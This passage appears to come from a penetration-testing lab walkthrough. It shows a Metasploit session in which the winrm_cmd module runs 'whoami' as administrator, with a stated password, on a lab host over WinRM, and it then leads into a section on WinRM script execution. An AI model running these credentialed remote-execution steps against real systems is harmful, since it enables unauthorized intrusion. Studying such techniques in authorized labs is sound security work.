   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     5985             yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   THREADS   1                yes       The number of concurrent threads (max one per host)
   URI       /wsman           yes       The URI of the WinRM service
   USERNAME                   yes       The username to authenticate as
   VHOST                      no        HTTP server virtual host

msf5 auxiliary(scanner/winrm/winrm_cmd) > set CMD whoami
CMD => whoami
msf5 auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD tinkerbell
PASSWORD => tinkerbell
msf5 auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 10.0.20.140
RHOSTS => 10.0.20.140
msf5 auxiliary(scanner/winrm/winrm_cmd) > set USERNAME administrator
USERNAME => administrator
msf5 auxiliary(scanner/winrm/winrm_cmd) > run

[+] 10.0.20.140:5985     : server\administrator

[+] Results saved to /root/.msf4/loot/20220917210947_default_10.0.20.140_winrm.cmd_result_789998.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/winrm/winrm_cmd) > 

WinRM Script Exec Remote Code Execution
